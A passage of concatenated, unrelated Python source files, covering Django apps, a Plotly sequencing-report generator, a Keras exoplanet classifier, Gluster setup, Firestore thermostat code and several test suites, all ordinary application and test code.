c = event.key_code
layout = self._layouts[1]
if c == Screen.KEY_HOME:
self.switch_focus(layout, 0, 0)
elif c == Screen.KEY_END:
self.switch_focus(layout, 0, len(self.settingsList) - 1)
elif c == Screen.KEY_PAGE_UP:
pass
elif c == Screen.KEY_PAGE_DOWN:
pass
|
import pandas as pd
import numpy as np
import plotly
from plotly.offline import plot
from plotly.subplots import make_subplots
import plotly.graph_objects as go
import sys
def plot_html(table):
'''
function splits table (a dictionary of 3 dataframes as values) and plots them in
a html report.
INPUT: table = dictionary with keys: 'intersections','complement','non_intersection'
'''
def table_to_json(df, normalize=True):
#df = table['intersection'] #pd.read_csv(sys.argv[1])
a = ['a_a','a_t','a_c','a_g']
c = ['c_a','c_t','c_c','c_g']
g = ['g_a','g_t','g_c','g_g']
t = ['t_a','t_t','t_c','t_g']
mutations = set(a+c+g+t).difference(set(['a_a','c_c','t_t','g_g']))
df.iloc[:,2:] #/= df[eval(column_name[0])].sum(axis=1).values.reshape(-1,1)
df = df.replace(np.inf,0).fillna(0)
# normalize the data to later rescale the data to between 0-1
dfc = df.copy()
errors = {'a': a, 'c': c, 'g': g, 't': t}
if normalize:
for i in errors.keys():
dfc.loc[:, errors[i]] /= (dfc.loc[:, errors[i]].sum(axis=1).values.reshape(-1,1) + 10e-6 )
table_max = dfc[mutations].max().max() * 1.1
table_min = dfc[mutations].min().min() * 0.5
df1 = dfc[(dfc.read==1)]
df2 = dfc[(dfc.read==2)]
# plot the data in horizontal subplots
fig = make_subplots(rows=1, cols=2,
subplot_titles=("Read 1", "Read 2"))
for mut in mutations:
fig.add_trace(
go.Scatter(
x=np.arange(1,df1.shape[0]+1),
y=df1[mut],
mode='markers',
name= mut + ' - R1'
),
row=1, col=1
)
fig.add_trace(
go.Scatter(
x = np.arange(1,df2.shape[0]+1),
y = df2[mut],
mode = 'markers',
name = mut + ' - R2',
),
row=1, col=2
)
# Update markers and color selection
markers = [
"circle", "circle-open-dot", "square", "diamond", "cross", "triangle-up",
"triangle-down","hexagon", "hexagram", "star", "octagon", "square-x"
]
colors = [
'rgb(31, 119, 180)', 'rgb(255, 127, 14)', 'rgb(44, 160, 44)', 'rgb(214, 39, 40)',
'rgb(148, 103, 189)', 'rgb(140, 86, 75)', 'rgb(227, 119, 194)', 'rgb(127, 127, 127)',
'rgb(188, 189, 34)', 'rgb(23, 190, 207)','rgb(188, 189, 150)', 'rgb(23, 190, 150)'
]
for n in np.arange(0,len(fig['data']),2):
m = n//2 + n%2
fig['data'][n]['marker']['symbol']=markers[m]
fig['data'][n+1]['marker']['symbol']=markers[m]
fig['data'][n]['marker']['color']=colors[m]
fig['data'][n+1]['marker']['color']=colors[m]
# final aestetic touches
fig.update_traces(mode='markers', marker_line_width=2, marker_size=10) #, visible="legendonly")
fig.update_layout(height=800, xaxis_title="Position in read", yaxis_title="Normalized counts")
fig.update_yaxes(range=[table_min, table_max], row=1, col=1)
fig.update_yaxes(range=[table_min, table_max], row=1, col=2)
# convert it to JSON
fig_json = fig.to_json()
return fig_json
fig_json_i = table_to_json(table['intersection'], normalize=False)
fig_json_c = table_to_json(table['complement'], normalize=False)
fig_json_n = table_to_json(table['non_intersection'], normalize=False)
fig_json_ic = table_to_json(table[ 'intersection_C'], normalize=False)
fig_json_cc = table_to_json(table['complement_C'], normalize=False)
fig_json_i_norm = table_to_json(table['intersection'])
fig_json_c_norm = table_to_json(table['complement'])
fig_json_n_norm = table_to_json(table['non_intersection'])
fig_json_ic_norm = table_to_json(table[ 'intersection_C'])
fig_json_cc_norm = table_to_json(table['complement_C'])
# HTML template
template = """<html>
<head>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.1/css/bootstrap.min.css">
<script src="https://cdn.plot.ly/plotly-latest.min.js"></script>
<title>Tasmanian Report</title>
<style>
.button {{
background-color: white; /* Green */
border: 2px solid #8bd9ff;
color: black;
padding: 16px 32px 0px -10px;
text-align: center;
text-decoration: none;
display: inline-block;
font-size: 16px;
margin: 20px 2px 0px 100px;
transition-duration: 0.4s;
cursor: pointer;
}}
.button:hover {{
background-color: #8bd9ff;
color: white;
}}
h1{{
background-color: #8bd9ff;
padding: 30px 0px 30px 0px;
margin: 10px 120px 0px 80px;
}}
.sidebar {{
height: 100%;
width: 180px;
position: fixed;
z-index: 1;
top: 0;
left: 0;
background-color: #111;
overflow-x: hidden;
padding-top: 16px;
}}
.sidebar a {{
padding: 6px 8px 6px 16px;
text-decoration: none;
font-size: 20px;
color: #818181;
display: block;
}}
.sidebar a:hover {{
color: #f1f1f1;
}}
.main {{
margin-left: 160px; /* Same as the width of the sidenav */
padding: 0px 10px;
}}
@media screen and (max-height: 450px) {{
.sidebar {{padding-top: 15px;}}
.sidebar a {{font-size: 18px;}}
}}
</style>
</head>
<body>
<script type="text/javascript">
function toggle_normalize(id1, id2) {{
var e = document.getElementById(id1);
var f = document.getElementById(id2);
if(e.style.display == 'block') {{
e.style.display = 'none';
f.style.display = 'block';
}}
else {{
e.style.display = 'block';
f.style.display = 'none';
}}
}}
</script>
<div class="sidebar">
<a href="#" style="font-size:30px; background-color:#8bd9ff;">Raw Couts</a>
<a href="#section_divPlotly1">Contained</a>
<a href="#section_divPlotly2">Boundary</a>
<a href="#section_divPlotly3">non-overlapping</a>
<a href="#section_divPlotly4">Contained - confidence</a>
<a href="#section_divPlotly5">Boundary - confidence</a>
<!--<a href="#" style="font-size:30px; background-color:#8bd9ff;">Normalized Couts</a>
<a href="#divPlotly1_norm">Intersections</a>
<a href="#divPlotly2_norm">Complementss</a>
<a href="#divPlotly4_norm">Intersections - confidence</a>
<a href="#divPlotly5_norm">Complements - confidence</a>-->
</div>
<div class="main">
<h1 align="center">Tasmanian artifacts metrics results </h1>
<!-- plot 1 -->
<div id='section_divPlotly1'>
<h2 style="padding-left: 40px; padding-top: 90px;">Intersections</h2>
<h3 style="padding-left: 40px; padding-right: 800; ">Includes all bases that intersect some fragment provided in the bed-file</h3>
<button class="button button1"; onclick="toggle_normalize('divPlotly1_norm', 'divPlotly1');">Counts/Normalize Counts</button>
<div id='divPlotly1_norm'>
<script>
var plotly_data = {};
Plotly.react('divPlotly1_norm', plotly_data.data, plotly_data.layout);
</script>
</div>
<div id='divPlotly1'>
<script>
var plotly_data2 = {}
Plotly.react('divPlotly1', plotly_data2.data, plotly_data2.layout);
</script>
</div>
</div>
<!-- plot 2 -->
<div id='section_divPlotly2'>
<h2 style="padding-left: 40px;padding-top: 60px;">Complements</h2>
<h3 style="padding-left: 40px; padding-right: 800;">Includes all bases from that do not intersect a fragment, from reads that intersect a fragment provided in the bed-file</h3>
<button class="button button1"; onclick="toggle_normalize('divPlotly2_norm', 'divPlotly2');">Counts/Normalize Counts</button>
<div id='divPlotly2_norm'>
<script>
var plotly_data = {};
Plotly.react('divPlotly2_norm', plotly_data.data, plotly_data.layout);
</script>
</div>
<div id='divPlotly2'>
<script>
var plotly_data2 = {}
Plotly.react('divPlotly2', plotly_data2.data, plotly_data2.layout);
</script>
</div>
</div>
<!-- plot 3 -->
<div id='section_divPlotly3'>
<h2 style="padding-left: 40px;padding-top: 60px;">Non-intersections</h2>
<h3 style="padding-left: 40px; padding-right: 800;">Includes all bases from reads with no intersections with the bed-file</h3>
<button class="button button1"; onclick="toggle_normalize('divPlotly3_norm', 'divPlotly3');">Counts/Normalize Counts</button>
<div id='divPlotly3_norm'>
<script>
var plotly_data = {};
Plotly.react('divPlotly3_norm', plotly_data.data, plotly_data.layout);
</script>
</div>
<div id='divPlotly3'>
<script>
var plotly_data2 = {}
Plotly.react('divPlotly3', plotly_data2.data, plotly_data2.layout);
</script>
</div>
</div>
<!-- plot 4 -->
<div id='section_divPlotly4'>
<h2 style="padding-left: 40px; padding-top: 90px;">Intersections confidence</h2>
<h3 style="padding-left: 40px; padding-right: 800; ">Includes all bases that intersect some fragment provided in the bed-file in confidence reads</h3>
<button class="button button1"; onclick="toggle_normalize('divPlotly4_norm', 'divPlotly4');">Counts/Normalize Counts</button>
<div id='divPlotly4_norm'>
<script>
var plotly_data = {};
Plotly.react('divPlotly4_norm', plotly_data.data, plotly_data.layout);
</script>
</div>
<div id='divPlotly4'>
<script>
var plotly_data2 = {}
Plotly.react('divPlotly4', plotly_data2.data, plotly_data2.layout);
</script>
</div>
</div>
<!-- plot 5 -->
<div id='section_divPlotly5'>
<h2 style="padding-left: 40px; padding-top: 90px;">Complement confidence</h2>
<h3 style="padding-left: 40px; padding-right: 800; ">Includes all complement bases in confidence reads</h3>
<button class="button button1"; onclick="toggle_normalize('divPlotly5_norm', 'divPlotly5');">Counts/Normalize Counts</button>
<div id='divPlotly5_norm'>
<script>
var plotly_data = {};
Plotly.react('divPlotly5_norm', plotly_data.data, plotly_data.layout);
</script>
</div>
<div id='divPlotly5'>
<script>
var plotly_data2 = {}
Plotly.react('divPlotly5', plotly_data2.data, plotly_data2.layout);
</script>
</div>
</div>
<script>
divPlotly1_norm.style.display = 'none';
divPlotly2_norm.style.display = 'none';
divPlotly3_norm.style.display = 'none';
divPlotly4_norm.style.display = 'none';
divPlotly5_norm.style.display = 'none';
</script>
</div> <!-- finish with class main here -->
</body>
</html>"""
# write the JSON to the HTML template
#with open('Tasmanian_artifact_metrics_report.html', 'w') as f:
# f.write(template.format(fig_json))
return template.format(fig_json_i_norm, fig_json_i, fig_json_c_norm, fig_json_c, fig_json_n_norm, fig_json_n, fig_json_ic_norm, fig_json_ic, fig_json_cc_norm, fig_json_cc)
#if __name__=='__main__':
#
# normalize = False
# for n,i in enumerate(sys.argv):
# if i in ["-normalize","--normalize","-n","--n","--norm","-norm"]:
# normalize=True
# if i in ["--table", "-t","--t","-table"]:
#
|
# Generated by Django 3.1.12 on 2021-06-22 08:12
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('home', '0010_merge_20210616_1048'),
('home', '0010_merge_20210617_1019'),
]
operations = [
]
|
#!/usr/bin/env python
'''
Author: Saijal Shakya
Development:
> LMS: December 20, 2018
> HRM: Febraury 15, 2019
> CRM: March, 2020
> Inventory Sys: April, 2020
> Analytics: ...
License: Credited
Contact: https://saijalshakya.com.np
'''
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'businessAnalytics.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
# Post-order DFS traversal
class Solution(object):
def rob(self, root):
"""
:type root: TreeNode
:rtype: int
"""
return max(self.robHelper(root))
def robHelper(self, root):
if not root:
return (0, 0)
leftHouseRobbery = self.robHelper(root.left)
rightHouseRobbery = self.robHelper(root.right)
robCurrentHouseNow = root.val + leftHouseRobbery[1] + rightHouseRobbery[1]
robCurrentLaterLater = max(leftHouseRobbery) + max(rightHouseRobbery)
return (robCurrentHouseNow, robCurrentLaterLater)
|
import os
import glob
import subprocess
import traceback
token = os.environ['BINSTAR_TOKEN']
cmd = ['binstar', '-t', token, 'upload', '--force']
cmd.extend(glob.glob('*.tar.bz2'))
try:
subprocess.check_call(cmd)
except subprocess.CalledProcessError:
traceback.print_exc()
|
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Post(models.Model):
author = models.ForeignKey(User, on_delete=models.CASCADE, related_name='post')
image = models.ImageField(upload_to='post_image')
caption = models.CharField(max_length=264,blank=True)
upload_date = models.DateTimeField(auto_now_add=True)
update_date = models.DateTimeField(auto_now=True)
class Meta :
ordering = ['-upload_date']
class like(models.Model):
post = models.ForeignKey(Post, on_delete=models.CASCADE,related_name='liked_post')
user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='liker')
date_created = models.DateTimeField(auto_now_add=True)
def __str__(self):
return '{}:{}'.format(self.user, self.post)
|
a,b=map(int,input().split())
print(a-1 if a>b else a)
|
import sys
import tensorflow as tf
from keras import backend as K
from keras.models import Sequential
from keras.layers import Conv1D, MaxPooling1D, Activation, CuDNNGRU, Flatten, Dense, Dropout, BatchNormalization
from keras.callbacks import TensorBoard, ModelCheckpoint
from imblearn.over_sampling import SMOTE
from utilities import prepare_data
import numpy as np
NUM_TRAIN = 5087
NUM_FLUXES = 3197
EPOCHS = 10
#Create the architecture of the model as well as compile it
def create_model():
model = Sequential()
#Convolutional Layer
model.add(Conv1D(filters = 64, kernel_size = 8, strides = 4, input_shape = (NUM_FLUXES, 1)))
model.add(MaxPooling1D(pool_size = 4, strides = 2))
model.add(Activation('relu'))
#GRU Layer
model.add(CuDNNGRU(units = 256, return_sequences = True))
#Flatten 3D data into 2D format
model.add(Flatten())
#Fully Connected Layer
model.add(Dense(units = 16, activation = "relu"))
model.add(Dropout(rate = 0.5))
model.add(BatchNormalization())
#Final Activation Layer
model.add(Dense(units = 1, activation = "sigmoid"))
model.compile(optimizer = "adam", loss = "binary_crossentropy", metrics = ["accuracy"])
print(model.summary())
return model
#Train the model with training and validation images using data augmentation or without it
def train(model_name):
#SMOTE for upsampling the minority class
X_train, Y_train = prepare_data(NUM_TRAIN, "data/exoTrain.csv")
sm = SMOTE()
X_train, Y_train = sm.fit_sample(X_train, Y_train)
#Reshape the array from 2D into 3D
X_train = np.reshape(X_train, (X_train.shape[0], X_train.shape[1], 1))
model = create_model()
#Add some checkpoints
tensorboard = TensorBoard(log_dir = './Graph', histogram_freq = 0, write_graph = True, write_images = True)
checkpoint_train = ModelCheckpoint(model_path, monitor = "loss", save_best_only = True)
print("Added checkpoints")
model.fit(x = X_train, y = Y_train, epochs = EPOCHS,
callbacks = [tensorboard, checkpoint_train])
#Code for running the program from the terminal
terminal_length = len(sys.argv)
if(terminal_length >= 2):
#Help command
if(sys.argv[1] == "-h" or sys.argv[1] == "--help"):
print("Write the model name as an argument (without file extension)")
#Train command with model_name
else:
model_path = "models/" + sys.argv[1] + ".h5"
print("Beginning to train the model with the name " + sys.argv[1])
train(model_path)
else:
print("Invalid command.")
print("Use -h or --help for the list of all possible commands")
|
from eth.vm.forks.berlin.headers import (
configure_header,
create_header_from_parent,
compute_berlin_difficulty,
)
compute_daejun_difficulty = compute_berlin_difficulty
create_daejun_header_from_parent = create_header_from_parent(
compute_berlin_difficulty
)
configure_daejun_header = configure_header(compute_daejun_difficulty)
|
import pprint
import math
datapoints = dict(
dp1=(-1.88, 2.05),
dp2=(-0.71, 0.42),
dp3=(2.41, -0.67),
dp4=(1.85, -3.80),
dp5=(-3.69, -1.33)
)
clusters = dict(
cluster_1=(2., 2.),
cluster_2=(-2., -2.)
)
def calc_distance(datapoint, cluster):
return math.sqrt(sum([(c - d)**2 for c, d in zip(cluster, datapoint)]))
def revise_cluster_centers(assigned_cluster, clusters):
output = {}
for cluster_name, dp_names in assigned_cluster.items():
cluster_result = []
for dp_index in range(len(clusters[cluster_name])):
dp_index_total = 0.
for dp_name in dp_names:
dp_index_total += datapoints[dp_name][dp_index]
dp_index_total = dp_index_total / len(dp_names)
cluster_result.append(dp_index_total)
output[cluster_name] = tuple(cluster_result)
return output
for iter_count in range(0, 5):
assigned_clusters = dict(cluster_1=[], cluster_2=[])
for datapoint, values in datapoints.items():
lowest_dist = float('inf')
assigned_cluster = None
for cluster, cluster_values in clusters.items():
distance = calc_distance(values, cluster_values)
if distance < lowest_dist:
lowest_dist = distance
assigned_cluster = cluster
assigned_clusters[assigned_cluster].append(datapoint)
clusters = revise_cluster_centers(assigned_clusters, clusters)
print "Assigned clusters", assigned_clusters
|
from pythonforandroid.build import Context
from pythonforandroid.graph import get_recipe_order_and_bootstrap
from pythonforandroid.bootstrap import Bootstrap
from itertools import product
import pytest
ctx = Context()
name_sets = [['python2'],
['kivy']]
bootstraps = [None,
Bootstrap.get_bootstrap('pygame', ctx),
Bootstrap.get_bootstrap('sdl2', ctx)]
valid_combinations = list(product(name_sets, bootstraps))
valid_combinations.extend(
[(['python3crystax'], Bootstrap.get_bootstrap('sdl2', ctx)),
(['kivy', 'python3crystax'], Bootstrap.get_bootstrap('sdl2', ctx))])
@pytest.mark.parametrize('names,bootstrap', valid_combinations)
def test_valid_recipe_order_and_bootstrap(names, bootstrap):
get_recipe_order_and_bootstrap(ctx, names, bootstrap)
invalid_combinations = [[['python2', 'python3crystax'], None],
[['python3'], Bootstrap.get_bootstrap('pygame', ctx)]]
@pytest.mark.parametrize('names,bootstrap', invalid_combinations)
def test_invalid_recipe_order_and_bootstrap(names, bootstrap):
with pytest.raises(SystemExit):
get_recipe_order_and_bootstrap(ctx, names, bootstrap)
def test_bootstrap_dependency_addition():
build_order, python_modules, bs = get_recipe_order_and_bootstrap(
ctx, ['kivy'], None)
assert (('hostpython2' in build_order) or ('hostpython3' in build_order))
def test_bootstrap_dependency_addition2():
build_order, python_modules, bs = get_recipe_order_and_bootstrap(
ctx, ['kivy', 'python2'], None)
assert 'hostpython2' in build_order
if __name__ == "__main__":
get_recipe_order_and_bootstrap(ctx, ['python3'],
Bootstrap.get_bootstrap('sdl2', ctx))
|
# coding: utf-8
from fabkit import filer, sudo, env, Service
from fablib.base import SimpleBase
class Gluster(SimpleBase):
def __init__(self):
self.data_key = 'gluster'
self.data = {
}
self.services = {
'CentOS Linux 7.*': [
'glusterd',
]
}
self.packages = {
'CentOS Linux 7.*': [
'centos-release-gluster36',
'glusterfs-server',
'glusterfs-fuse',
]
}
def init_after(self):
for cluster in self.data.get('clusters', {}).values():
if env.host in cluster['hosts']:
self.data.update(cluster)
def setup(self):
data = self.init()
Service('firewalld').stop().disable()
self.install_packages()
self.start_services().enable_services()
for volume in data['volume_map'].values():
filer.mkdir(volume['brick'])
def setup_peer(self):
"""
require serial task.
"""
data = self.init()
for host in data['hosts']:
if host != env.host:
sudo('gluster peer probe {0}'.format(host))
def setup_volume(self):
"""
require serial task.
"""
data = self.init()
if data['hosts'][0] != env.host:
return
for volume in data['volume_map'].values():
bricks = ''
replica_option = 'replica 2' if len(data['hosts']) > 1 else ''
for host in data['hosts']:
bricks += '{0}:{1} '.format(host, volume['brick'])
sudo('gluster volume info {0[name]} || gluster volume create '
'{0[name]} {1} {2} force'.format(
volume, replica_option, bricks))
sudo('gluster volume info {0[name]} | grep Started'
' || gluster volume start {0[name]}'.format(
volume))
def mount_local(self):
data = self.init()
for volume in data['volume_map'].values():
filer.Editor('/etc/fstab').a('localhost:/{0} /mnt/{0} glusterfs '
'defaults,_netdev 0 0'.format(volume['name']))
filer.mkdir('/mnt/{0}'.format(volume['name']))
sudo('mount -a')
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django import get_version
from django.apps import AppConfig
from django.utils.translation import ugettext_lazy as _
class ShopConfig(AppConfig):
name = 'shop'
verbose_name = _("Shop")
def ready(self):
from django_fsm.signals import post_transition
from jsonfield.fields import JSONField
from rest_framework.serializers import ModelSerializer
from shop.rest.serializers import JSONSerializerField
from shop.models.notification import order_event_notification
post_transition.connect(order_event_notification)
# Monkey patches for Django-1.7
if get_version() < (1, 8):
from django.utils import numberformat
from shop.patches import numberformat as patched_numberformat
numberformat.format = patched_numberformat.format
# add JSONField to the map of customized serializers
ModelSerializer.serializer_field_mapping[JSONField] = JSONSerializerField
|
from django.test import TestCase
from .factories import GalleryFactory
class RequestGalleryTest(TestCase):
urls = 'photologue.tests.test_urls'
def setUp(self):
super(RequestGalleryTest, self).setUp()
self.gallery = GalleryFactory(slug='test-gallery')
def test_archive_gallery_url_works(self):
response = self.client.get('/ptests/gallery/')
self.assertEqual(response.status_code, 200)
def test_archive_gallery_empty(self):
"""If there are no galleries to show, tell the visitor - don't show a
404."""
self.gallery.is_public = False
self.gallery.save()
response = self.client.get('/ptests/gallery/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['latest'].count(),
0)
def test_paginated_gallery_url_works(self):
response = self.client.get('/ptests/gallerylist/')
self.assertEqual(response.status_code, 200)
def test_gallery_works(self):
response = self.client.get('/ptests/gallery/test-gallery/')
self.assertEqual(response.status_code, 200)
def test_archive_year_gallery_works(self):
response = self.client.get('/ptests/gallery/2011/')
self.assertEqual(response.status_code, 200)
def test_archive_month_gallery_works(self):
response = self.client.get('/ptests/gallery/2011/12/')
self.assertEqual(response.status_code, 200)
def test_archive_day_gallery_works(self):
response = self.client.get('/ptests/gallery/2011/12/23/')
self.assertEqual(response.status_code, 200)
def test_detail_gallery_works(self):
response = self.client.get('/ptests/gallery/2011/12/23/test-gallery/')
self.assertEqual(response.status_code, 200)
def test_redirect_to_list(self):
"""Trivial test - if someone requests the root url of the app
(i.e. /ptests/'), redirect them to the gallery list page."""
response = self.client.get('/ptests/')
self.assertRedirects(response, '/ptests/gallery/', 301, 200)
class GalleryPaginationTest(TestCase):
urls = 'photologue.tests.test_urls'
def test_pagination(self):
for i in range(1, 23):
GalleryFactory(title='gallery{0:0>3}'.format(i))
response = self.client.get('/ptests/gallerylist/')
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['object_list']),
20)
# Check first and last items.
self.assertEqual(response.context['object_list'][0].title,
'gallery022')
self.assertEqual(response.context['object_list'][19].title,
'gallery003')
# Now get the second page of results.
response = self.client.get('/ptests/gallerylist/?page=2')
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['object_list']),
2)
# Check first and last items.
self.assertEqual(response.context['object_list'][0].title,
'gallery002')
self.assertEqual(response.context['object_list'][1].title,
'gallery001')
|
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.contrib.auth.models import User
from astrometry.net.models import UserProfile
@receiver(post_save, sender=User)
def add_user_profile(sender, instance, created, raw, **kwargs):
print('add_user_profile() called. sender', sender)
print('inst', instance)
print('created', created)
print('raw', raw)
if created and not raw:
user = instance
try:
print('profile exists:', user.profile)
except:
print('profile does not exist -- creating one!')
from astrometry.net.models import create_new_user_profile
profile = create_new_user_profile(user)
profile.save()
print('Created', user.profile)
|
import unittest
from conans.search.binary_html_table import RowResult, Headers, Results
class RowResultTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
data = {'id': '1234',
'outdated': True,
'extra': 'never used',
'settings': {'os': 'Windows'},
'options': {'opt.key1': 23},
'requires': ['pkg1/version:1234', 'pkg2/version@user/channel:12345']}
cls.row_result = RowResult("remote", "name/version@user/testing", data)
def test_basic(self):
self.assertEqual(self.row_result.remote, "remote")
self.assertEqual(self.row_result.reference, "name/version@user/testing")
self.assertEqual(self.row_result.recipe, "name/version@user/testing")
self.assertEqual(self.row_result.package_id, "1234")
self.assertEqual(self.row_result.outdated, True)
def test_row(self):
headers = Headers(settings=['os', 'os.api'], options=['opt.key1'], requires=True,
keys=['remote', 'reference', 'outdated', 'package_id'])
row = list(self.row_result.row(headers))
self.assertEqual(row, ['remote', 'name/version@user/testing', True, '1234', # Keys
'Windows', None, # Settings
23, # Options
'pkg1/version, pkg2/version@user/channel' # Requires
])
class HeadersTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
settings = ['build_type', 'os', 'other', 'compiler', 'compiler.version',
'compiler.libcxx', 'os.api', ]
options = ['opt.key1', 'opt2']
requires = True
keys = ['remote', 'reference', 'outdated', 'package_id']
cls.headers = Headers(settings, options, requires, keys)
def test_settings_ordering(self):
self.assertEqual(self.headers.settings, ['os', 'os.api', 'compiler', 'compiler.libcxx',
'compiler.version', 'build_type', 'other'])
def test_1row(self):
row = self.headers.row(n_rows=1)
# Order: keys, settings, options and requires
self.assertEqual(row, [
'remote', 'reference', 'outdated', 'package_id',
'os', 'os.api', 'compiler', 'compiler.libcxx', 'compiler.version', 'build_type', 'other',
'opt.key1', 'opt2',
'requires'])
def test_2row(self):
row = self.headers.row(n_rows=2)
self.assertEqual(row, [
# Keys
('remote', ['']), ('reference', ['']), ('outdated', ['']), ('package_id', ['']),
# Settings
('os', ['', 'api']), ('compiler', ['', 'libcxx', 'version']), ('build_type', ['']),
('other', ['']),
# Options
('options', ['opt.key1', 'opt2']),
# Requires
('requires', [''])
])
class ResultsTestCase(unittest.TestCase):
def test_gather_data(self):
# Data returned by the API protocol
json = [
{
'remote': 'remote1',
'items': [{
'recipe': {'id': 'name/version@user/channel'},
'packages': [
{
'settings': {'os': 'Windows', 'os.api': 23},
'options': {'opt.key1': 'option_value'},
'requires': []
},
{
'settings': {'os': 'Windows', 'compiler': 'VS'},
'options': {},
'requires': ['pkgA/vv:1234', 'pkgB/vv@user/testing:12345']
}
]
}]
},
{
'remote': 'remote2',
'items': [{'packages': []}]
}
]
results = Results(json)
self.assertListEqual(sorted(results.settings), sorted(['os.api', 'os', 'compiler']))
self.assertListEqual(results.options, ['opt.key1'])
self.assertEqual(results.requires, True)
self.assertListEqual(sorted(results.remotes), sorted(['remote1', 'remote2']))
|
# -*- coding: utf-8 -*-
__author__ = 'zj'
import matplotlib.pyplot as plt
import numpy as np
if __name__ == '__main__':
x = np.linspace(0, 20, 100) # Create a list of evenly-spaced numbers over the range
plt.plot(x, np.sin(x)) # Plot the sine of each x point
plt.show() # Display the plot
|
import os
import configparser
import platform
config = configparser.ConfigParser()
config.read('./config.ini')
location = config.get('MODE', 'LOCATION')
print ("[temperature_firestore] location", location)
if location == "local":
platform = platform.system()
print("[temperature_firestore] platform: ", platform)
if platform == "Windows":
credential_path = config.get('GOOGLE_APPLICATION_CREDENTIALS_FILE', 'WINDOWS')
credential_path = credential_path.strip('\"')
print("[temperature_firestore] windows")
elif platform == "Linux":
credential_path = config.get('GOOGLE_APPLICATION_CREDENTIALS_FILE', 'LINUX')
# credential_path = credential_path.strip('\"') # ???QUESTION??? Did not check at Linux yet. BUT, it need for Windows !!!!!!!!!!!!!!!!!!!!!!!!!
print("[temperature_firestore] linux")
print("[temperature_firestore] credential_path: ", credential_path)
# Project ID is determined by the GCLOUD_PROJECT environment variable
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = credential_path
from google.cloud import firestore
class TempVal():
# This is set for temperatures
_targetT: int
_weatherT: int
_roomT: int
_comfortT: int
_economT: int
_waterT: int
_serversStatus: str
apartment = u'test-apartment-135'
db = None
def __init__(self):
self.db = firestore.Client()
doc_ref = self.db.collection(u'smarthome').document(self.apartment) # Let apartment=133 for test only
doc = doc_ref.get()
if doc.exists:
print(f'[temperature_firestore] Document data: {doc.to_dict()}', self.apartment)
else:
print(u'No such apartment:', self.apartment)
doc_ref.set({
'targetT': 21,
'weatherT': 12,
'roomT': 23,
'comfortT': 24,
'economT': 14,
'waterT': 35,
})
doc_ref = self.db.collection(u'smarthome').document(self.apartment)
def fs_ref(self):
return self.db.collection(u'smarthome').document(self.apartment)
######################################
@property
def targetT(self):
self._targetT = self.fs_ref().get().to_dict()['targetT']
return self._targetT
@targetT.setter
def targetT(self, val):
self._targetT = val
self.fs_ref().set({'targetT': val}, merge=True)
######################################
######################################
@property
def roomT(self):
self._roomT = self.fs_ref().get().to_dict()['roomT']
return self._roomT
@roomT.setter
def roomT(self, val):
self._roomT = val
self.fs_ref().set({'roomT': val}, merge=True)
######################################
@property
def comfortT(self):
self._comfortT = self.fs_ref().get().to_dict()['comfortT']
return self._comfortT
@comfortT.setter
def comfortT(self, val):
self._comfortT = val
self.fs_ref().set({'comfortT': val}, merge=True)
######################################
@property
def economT(self):
self._economT = self.fs_ref().get().to_dict()['economT']
return self._economT
@economT.setter
def economT(self, val):
self._economT = val
self.fs_ref().set({'economT': val}, merge=True)
######################################
@property
def waterT(self):
self._waterT = self.fs_ref().get().to_dict()['waterT']
return self._waterT
@waterT.setter
def waterT(self, val):
self._waterT = val
self.fs_ref().set({'waterT': val}, merge=True)
######################################
@property
def serversStatus(self):
self._serversStatus = self.fs_ref().get().to_dict()['serversStatus']
return self._serversStatus
@serversStatus.setter
def serversStatus(self, val):
self._serversStatus = val
self.fs_ref().set({'serversStatus': val}, merge=True)
######################################
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.18 on 2019-03-11 11:05
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Activities', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='activities',
name='status',
field=models.CharField(choices=[('in_progress', 'in_progress'), ('finished', 'finished')], max_length=255),
),
]
|
name = 'gsodpy'
|
#############################################################################
#
# VFRAME
# MIT License
# Copyright (c) 2020 Adam Harvey and VFRAME
# https://vframe.io
#
#############################################################################
import click
from vframe.settings.app_cfg import VALID_PIPE_MEDIA_EXTS
from vframe.utils.click_utils import generator
@click.command('')
@click.option('-i', '--input', 'opt_input', required=True,
help='Path to image or directory')
@click.option('-e', '--exts', 'opt_exts', default=VALID_PIPE_MEDIA_EXTS,
multiple=True, help='Extensions to glob for')
@click.option('-r', '--recursive', 'opt_recursive', is_flag=True,
help='Recursive glob')
@click.option('--slice', 'opt_slice', type=(int, int), default=(-1, -1),
help="Slice list of inputs")
@click.option('--skip-frames', 'opt_skip_frames', is_flag=True,
help='Skip all frames, only iterate files')
@generator
@click.pass_context
def cli(ctx, sink, opt_input, opt_recursive, opt_exts, opt_slice, opt_skip_frames):
"""Open media for processing"""
from tqdm import tqdm
import dacite
from vframe.settings.app_cfg import LOG, SKIP_FRAME, READER, SKIP_FILE
from vframe.settings.app_cfg import USE_PREHASH, USE_DRAW_FRAME
from vframe.settings.app_cfg import MEDIA_FILTERS, SKIP_MEDIA_FILTERS
from vframe.models.media import MediaFileReader
from vframe.utils.sys_utils import SignalInterrupt
from vframe.utils.file_utils import get_ext
# ---------------------------------------------------------------------------
# init
sigint = SignalInterrupt()
init_obj = {
'filepath': opt_input,
'exts': tuple(opt_exts),
'slice_idxs': opt_slice,
'recursive': opt_recursive,
